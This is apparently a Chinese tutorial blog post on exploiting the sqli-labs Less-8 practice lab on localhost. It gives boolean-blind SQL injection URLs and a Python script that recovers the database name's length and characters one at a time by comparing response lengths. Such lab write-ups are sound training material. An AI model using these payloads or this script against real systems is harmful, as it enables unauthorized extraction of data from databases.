简单的exp编写
不写注释的代码,都是在耍流氓,而我不想做个女流氓
场景:sqli-master -8
1.判断注入类型
http://localhost/sqli-labs-master/Less-8/?id=1' and 1=1--+
http://localhost/sqli-labs-master/Less-8/?id=1' and 1=2--+
2.判断列数
http://localhost/sqli-labs-master/Less-8/?id=1' order by 3--+
3,判断数据库长度
http://localhost/sqli-labs-master/Less-8/?id=1' and length(database())=8--+
4,判断数据库名字
http://localhost/sqli-labs-master/Less-8/?id=1' and substr(database(),1,1)='s'--+
substr 从第一位开始截取,截取一位
#!/usr/bin/pyhton
#1.制造payload
#2.根据数据库的长度]and length(database())=8#
#3.根据数据库的名字】and substr(database(),1,1)='s'#
import requests
#a-Z的包
import string
url="http://localhost/sqli-labs-master/Less-8/?id=1"
#拼接数据库名字
database_name=''
def exp(payload_url):
#发包
rep=requests.get(payload_url)
#获取包长度
rep_len=len(rep.text)
return rep_len
# 定义入口
if __name__ == '__main__':
#url="http://localhost/sqli-labs-master/Less-8/?id=1"
# 判断正确长度的payload
nomarl_rep=requests.get(url)
nomarl_len=len(nomarl_rep.text)
#2.判断数据名字的长度
for i in range(1,20):
# str将i强制转化为字符类型 转义'
length_payload="\'and length(database())="+str(i)+"%23"
payload_url=url+length_payload
#print payload_url
#对得到的poayload_url包进行判断执行
result_len=exp(payload_url)
if(result_len==nomarl_len):
print("The database length is %d"% i)
break
#3.判断数据库的名字
for x in range(1,i+1):
for y in string.ascii_lowercase:
char_payload="\'and substr(database(),"+str(x)+",1)=\'"+y+"\'%23"
#print char_payload
payload_url=url+char_payload
result_len=exp(payload_url)
if(result_len==nomarl_len):
#拼接
database_name+=y
print("the databasename is %s"% database_name)
break
运行截图